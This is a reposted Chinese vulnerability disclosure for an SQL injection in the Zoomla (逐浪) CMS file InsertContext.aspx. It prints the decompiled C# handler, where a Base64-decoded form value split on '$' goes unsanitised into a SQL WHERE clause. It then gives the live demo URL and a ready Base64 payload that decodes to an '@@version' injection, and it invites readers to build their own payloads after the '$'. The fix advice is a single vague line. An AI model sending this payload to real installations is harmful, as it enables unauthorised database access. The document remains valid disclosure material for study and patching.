好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

逐浪CMS某处编码SQL注入漏洞 - 网站安全 - 自学p

逐浪CMS某处编码SQL注入 漏洞

地址  

http://demo.zoomla.cn/3d/InsertContext. asp x protected void Page_Load(object sender, EventArgs e) { if (base.Request.QueryString["type"] != null) { this.md.Caddtime = DateTime.Now; this.md.Cadduser = this.user.GetLogin().UserName; string s = base.Request.Form.ToString(); s = base.Server.UrlDecode(s); try { s = BaseClass.FromBase64String(s); //base64转换 } catch (Exception exception) { s = exception.ToString() + s; } if (s.IndexOf("$") > -1) { string[] strArray = s.Split(new char[] { '$' }, StringSplitOptions.RemoveEmptyEntries); //分割 if (base.Request.QueryString["type"].ToString() == "Suser") { DataTable table = this.bduser.Select_Where(" Dutype=1 and DuShow=" + strArray[1], " * ", ""); //数组第二部分没处理 存在注入 if (table.Rows.Count > 0) { this.md.Ctouid = DataConverter.CLng(table.Rows[0]["DUid"].ToString()); } this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", ""); if ((this.dt.Rows.Count > 0) && (this.mduser.Dislogin == 0)) { this.mduser.Dmessage++; } } else { this.md.Ctouid = DataConverter.CLng(strArray[1]); this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", ""); this.mduser.Dmessage++; } this.md.Ccontent = BaseClass.Htmlcode(strArray[0]); this.md.ChatType = 0; this.SetUserContext(); } else { this.dt = this.bduser.Select_Where(" Duid=" + this.user.GetLogin().UserID, " * ", ""); this.md.Ccontent = BaseClass.Htmlcode(s); this.md.ChatType = 1; this.SetUserContext(); } this.bd.GetInsert(this.md); } if (this.dt != null) { this.dt.Dispose(); } }

访问

 

http://demo.zoomla.cn/3d/InsertContext.aspx?type=Suser

提交

YSQxIGFuZCAoc2VsZWN0IEBAdmVyc2lvbik+MCAtLQ==

这个是base64的值 原来的值是 a$1 and (select @@version)>0 -- $后面可自己构造 然后整个字符串转换为base64编码  

修复方案:

对参数进行处理

 

查看更多关于逐浪CMS某处编码SQL注入漏洞 - 网站安全 - 自学p的详细内容...

  阅读:100次